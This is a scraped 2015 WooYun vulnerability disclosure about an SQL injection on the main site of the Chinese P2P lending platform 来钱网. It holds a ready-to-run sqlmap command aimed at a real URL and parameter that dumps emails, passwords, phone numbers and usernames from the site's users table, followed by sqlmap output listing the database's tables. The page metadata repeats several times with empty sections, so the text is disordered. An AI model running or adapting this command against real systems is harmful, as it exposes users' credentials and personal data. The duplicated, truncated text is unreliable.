P2P金融安全之来钱网主站SQL注射(信息泄露)

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0138264

漏洞标题： P2P金融安全之来钱网主站SQL注射(信息泄露)

漏洞作者：路人甲

提交时间：2015-09-01 09:15

修复时间：2015-10-16 09:16

公开时间：2015-10-16 09:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2015-09-01：积极联系厂商并且等待厂商认领中，细节不对外公开
2015-10-16：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

睡觉前的一个意外

详细说明：

Sqlmap -u "http://www.laiqian.com/index.php?r=ZipoGegu/IpoGegu&ipo_id=147&code=HLI&navIndex1=1" -p ipo_id -D js_fund -T users -C email,password,phone,username --dump

漏洞证明：

atabase: js_fund
[101 tables]
+-----------------------------------------------+
| access_count                                  |
| all_us_stock_info                             |
| area                                          |
| category                                      |
| club_cellphone_count                          |
| club_express                                  |
| club_regist                                   |
| country                                       |
| email_config                                  |
| feedback                                      |
| financial_type_choose                         |
| financing_advisor                             |
| financing_appointment                         |
| financing_issue                               |
| financing_news                                |
| financing_product                             |
| financing_product_comment                     |
| financing_product_detail                      |
| financing_product_type                        |
| financing_rate_trend                          |
| financing_support                             |
| friends_group                                 |
| identification                                |
| ipo_company                                   |
| ipo_company_status                            |
| ipo_issuers                                   |
| ipo_product                                   |
| ipo_quiz                                      |
| job                                           |
| lq_temp                                       |
| manager                                       |
| medal                                         |
| news                                          |
| operation_log                                 |
| permission                                    |
| post_comment                                  |
| product_comment                               |
| product_quiz                                  |
| product_reply                                 |
| product_saler                                 |
| product_support                               |
| question_answer                               |
| role                                          |
| role_permission                               |
| slide                                         |
| sp500_us_stock_info                           |
| stock

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0138264

漏洞标题： P2P金融安全之来钱网主站SQL注射(信息泄露)

相关厂商：来钱网

漏洞作者：路人甲

提交时间：2015-09-01 09:15

修复时间：2015-10-16 09:16

公开时间：2015-10-16 09:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2015-0138264

漏洞标题： P2P金融安全之来钱网主站SQL注射(信息泄露)

相关厂商：来钱网

漏洞作者： 路人甲

提交时间：2015-09-01 09:15

修复时间：2015-10-16 09:16

公开时间：2015-10-16 09:16

漏洞类型：SQL注射漏洞

危害等级：高

自评Rank：20

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2015-0138264"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 路人甲@乌云

漏洞回应

厂商回应：

漏洞评价：

评论

漏洞概要关注数(24) 关注此漏洞

漏洞作者：路人甲

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源路人甲@乌云